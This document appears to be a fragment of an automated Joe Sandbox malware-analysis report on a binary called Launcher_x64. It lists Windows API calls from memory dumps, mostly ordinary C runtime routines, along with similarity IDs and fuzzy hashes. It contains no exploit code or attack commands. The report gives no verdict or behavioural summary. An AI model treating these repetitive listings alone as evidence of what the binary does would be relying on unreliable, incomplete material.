• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
Similarity
• API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3codecvt
• String ID:
• API String ID: 3716348337-0
APIs
• WriteConsoleW.KERNEL32(00000000,?,?,00000000,00000000,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000), ref: 00D321F7
• GetLastError.KERNEL32(?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?,?,?,00D2AE0F,?), ref: 00D32203
  • Part of subcall function 00D32254: CloseHandle.KERNEL32(FFFFFFFE,00D32213,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?,?), ref: 00D32264
• ___initconout.LIBCMT ref: 00D32213
  • Part of subcall function 00D32235: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,00D321D1,00D316BC,?,?,00D2B4C9,?,00000000,00000000,?), ref: 00D32248
• WriteConsoleW.KERNEL32(00000000,?,?,00000000,?,00D316CF,00000000,00000001,?,?,?,00D2B4C9,?,00000000,00000000,?), ref: 00D32228
Memory Dump Source
• Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
• String ID:
• API String ID: 2744216297-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(-00000002,00000000,?,00000000,00000000,?,00D1D04D,?,?,?,00000055,?,-00000050,?,?,?), ref: 00D27BA2
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000,-00000002,00000000,?,00000000,00000000,?,00D1D04D,?,?,?,00000055,?,-00000050,?,?), ref: 00D27BD9
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.1731119078.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000000.00000002.1731090431.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731148881.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731171791.0000000000D3F000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731197995.0000000000D40000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731214005.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731290251.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1731334696.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast$CodePageValid
                                                                                                                                                                                                                                                                                        • String ID: utf8
                                                                                                                                                                                                                                                                                        • API String ID: 943130320-905460609
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00D22B4B,?,?,00000000,00000000,00000000,?), ref: 00D22C6F
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: EncodePointer
                                                                                                                                                                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D2272D
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm$csm
                                                                                                                                                                                                                                                                                        • API String ID: 3493665558-3733052814
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D13114
                                                                                                                                                                                                                                                                                        • RaiseException.KERNEL32(?,?,?,?), ref: 00D13139
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D17223: RaiseException.KERNEL32(E06D7363,00000001,00000003,00D15F93,?,?,?,?,00D15F93,00001000,00D3E1AC,00001000), ref: 00D17284
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D1F7B9: IsProcessorFeaturePresent.KERNEL32(00000017,00D1A37B,?,?,?,?,00000000), ref: 00D1F7D5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionRaise$FeaturePresentProcessor__alloca_probe_16
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1924019822-1018135373
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,2000000B,00D28515,00000002,00000000,?,?,?,00D28515,?,00000000), ref: 00D28BDD
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,20001004,00D28515,00000002,00000000,?,?,?,00D28515,?,00000000), ref: 00D28C06
                                                                                                                                                                                                                                                                                        • GetACP.KERNEL32(?,?,00D28515,?,00000000), ref: 00D28C1B
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: InfoLocale
                                                                                                                                                                                                                                                                                        • String ID: ACP$OCP
                                                                                                                                                                                                                                                                                        • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                                        • Opcode ID: e57decdd37a52e6218d956aa21e20c76ba66e0e136436aeee860d309e6587f8a
                                                                                                                                                                                                                                                                                        • Instruction ID: 16eda18aced5fe7286a0310bb74890f4cfac05d7844bb2afde14c5d01666f21f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e57decdd37a52e6218d956aa21e20c76ba66e0e136436aeee860d309e6587f8a
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6421CD62702120AADB348F54F941A97B3A7EF74B68B5E8429E549D7200EF31DD40F770
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: GetLastError.KERNEL32(00000000,?,00D25749), ref: 00D23417
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D23413: SetLastError.KERNEL32(00000000,?,?,00000028,00D1F7C9), ref: 00D234B9
                                                                                                                                                                                                                                                                                        • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 00D284E7
                                                                                                                                                                                                                                                                                        • IsValidCodePage.KERNEL32(00000000), ref: 00D28525
                                                                                                                                                                                                                                                                                        • IsValidLocale.KERNEL32(?,00000001), ref: 00D28538
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00D28580
                                                                                                                                                                                                                                                                                        • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00D2859B
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 415426439-0
                                                                                                                                                                                                                                                                                        • Opcode ID: d85e14ccc02a1d04b3671f13216dcf2599b42aeb8d0d96dfc3b3ef886d002ae0
                                                                                                                                                                                                                                                                                        • Instruction ID: b73c5bf5b4ac5ed6c15cc3fada67feb6a38e569b31b43dc761ded1df80da9332
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d85e14ccc02a1d04b3671f13216dcf2599b42aeb8d0d96dfc3b3ef886d002ae0
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 70518371901226AFDB20EFA4EC41ABE77B9FF64708F084469E910E7150DB74DA41DB71
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                                                                                                        • Opcode ID: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                                        • Instruction ID: 93956f05759d0228050c6224d6f0c7fefcf0d186ad30724eb730d88210f7296c
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e210328f8d4f359fac80214519e11883391db29b0651a67b32ed7d6b3dc8e133
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75022E75E012299FDF14CFA9D8806ADBBF1FF68318F288269D515E7341D731A941CBA0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D29216
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFindFirst
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1974802433-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 6321883f8ca6365d62f3f81bb7a087317c05e5b91a8cd923acc66427573220da
                                                                                                                                                                                                                                                                                        • Instruction ID: aea15b9ec05a7b294cce697f436078a6410a41b13d02d052810a386d72cbe51e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6321883f8ca6365d62f3f81bb7a087317c05e5b91a8cd923acc66427573220da
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D71E671804279AFDF21EF24AC99AEAF7B9EF15308F1841D9E04D93251DA304E858F34
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00D16534
                                                                                                                                                                                                                                                                                        • IsDebuggerPresent.KERNEL32 ref: 00D16600
                                                                                                                                                                                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00D16619
                                                                                                                                                                                                                                                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 00D16623
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
• Associated: 00000002.00000002.1729401188.0000000000D00000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729459773.0000000000D34000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729487928.0000000000D3F000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729503001.0000000000D44000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729520518.0000000000D47000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000002.00000002.1729559061.0000000000D91000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCPInfo.KERNEL32(00000000,00000000,00000000,7FFFFFFF,?,00D31F0D,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 00D31FC8
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D32083
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D32112
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D3215D
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D32163
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D32199
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D3219F
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D321AF
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 00D16AB0
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D16ADC
                                                                                                                                                                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 00D16B1B
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00D16B38
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00D16B77
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D16B94
                                                                                                                                                                                                                                                                                        • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00D16BD6
                                                                                                                                                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00D16BF9
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: _strrchr
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17977
                                                                                                                                                                                                                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00D1797F
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17A08
                                                                                                                                                                                                                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00D17A33
                                                                                                                                                                                                                                                                                        • _ValidateLocalCookies.LIBCMT ref: 00D17A88
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_d00000_Launcher_x64.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                                                                        • API String ID: 1170836740-1018135373
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,BB40E64E,?,00D24208,00D03E32,?,00000000,?), ref: 00D241BA
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                                                        • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                                                        • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00D16CC1
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00D16CCF
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 00D16CE0
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressProc$HandleModule
                                                                                                                                                                                                                                                                                        • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                                                                                                                                                                        • API String ID: 667068680-1047828073
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,00D21FA5,00D17361,00D16681), ref: 00D21FBC
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00D21FCA
                                                                                                                                                                                                                                                                                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D21FE3
                                                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,00D21FA5,00D17361,00D16681), ref: 00D22035
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                        • Opcode ID: ed49ea4d891cc915d607d0cbdecba202cac6a773dbb729e1c6627eedceded169
                                                                                                                                                                                                                                                                                        • Instruction ID: 9172175d43b620fb54452a59cb75eadc4942d9008b64405bed5804baea7c9068
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed49ea4d891cc915d607d0cbdecba202cac6a773dbb729e1c6627eedceded169
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C201B93A2063317EF6252F75BD459363A55DB7577C7340229F630891E2EFA24D01E970
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • type_info::operator==.LIBVCRUNTIME ref: 00D22945
                                                                                                                                                                                                                                                                                        • CallUnexpected.LIBVCRUNTIME ref: 00D22BBE
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CallUnexpectedtype_info::operator==
                                                                                                                                                                                                                                                                                        • String ID: csm$csm$csm
                                                                                                                                                                                                                                                                                        • API String ID: 2673424686-393685449
                                                                                                                                                                                                                                                                                        • Opcode ID: ded4d7c9d5786f7a7a8b3e7d90eb16cac952cb772b27c3731f63af38aff9fff2
                                                                                                                                                                                                                                                                                        • Instruction ID: 099f1a983bead430db8d892cac098312dab5aeb4eee53b7df2bc5f6ba609434e
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ded4d7c9d5786f7a7a8b3e7d90eb16cac952cb772b27c3731f63af38aff9fff2
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CEB16831800229AFCF25DFA4E8819BEB7B5FF68318F58415AF8116B216C735DA51CBB1
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,BB40E64E,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CA71
                                                                                                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CA83
                                                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,00000000,00D33374,000000FF,?,00D1CAFD,00D1C9E4,?,00D1CB99,00000000), ref: 00D1CAA5
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                        • Opcode ID: 2ec70da9652abb6bdd633b8c01381a857fefd2f6d2565286116293291a31fba1
                                                                                                                                                                                                                                                                                        • Instruction ID: e5d7c1af655b16d56e28a94e1cb4a9addef38e0bc111745f8a6133cc937802e8
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2ec70da9652abb6bdd633b8c01381a857fefd2f6d2565286116293291a31fba1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 07016735654719AFDB11DF54EC09BAEBBB9FF04714F044525E815E2290DB74A900CE70
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D24952
                                                                                                                                                                                                                                                                                        • __alloca_probe_16.LIBCMT ref: 00D24A1B
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24A82
                                                                                                                                                                                                                                                                                          • Part of subcall function 00D231C1: HeapAlloc.KERNEL32(00000000,?,?,?,00D122A9,?,?,00D03E32,00001000,?,00D03D7A), ref: 00D231F3
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24A95
                                                                                                                                                                                                                                                                                        • __freea.LIBCMT ref: 00D24AA2
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 1096550386-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 8ea5535b607ae4ce42591fa7d74c569b40dff02ef0d70064d1e17c2a100187b1
                                                                                                                                                                                                                                                                                        • Instruction ID: 522ea74b8b8b92e257baff6af0a9a0c4aa5246b3de6ef5b88db5fe28b39ccf13
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8ea5535b607ae4ce42591fa7d74c569b40dff02ef0d70064d1e17c2a100187b1
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E851DD72640226BFEF219FA0EC81EBB7BA9EFA471CB194528FD04D6141EB34DD508674
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000002.00000002.1729424893.0000000000D01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D00000, based on PE: true
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: CloseFileHandleSize
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 3849164406-0
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32(?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15C93
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15CB2
                                                                                                                                                                                                                                                                                        • AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15CE0
                                                                                                                                                                                                                                                                                        • TryAcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,00D15C5C,?,00000000,?,00D0B93C,?,?,00D0D94E), ref: 00D15D3B
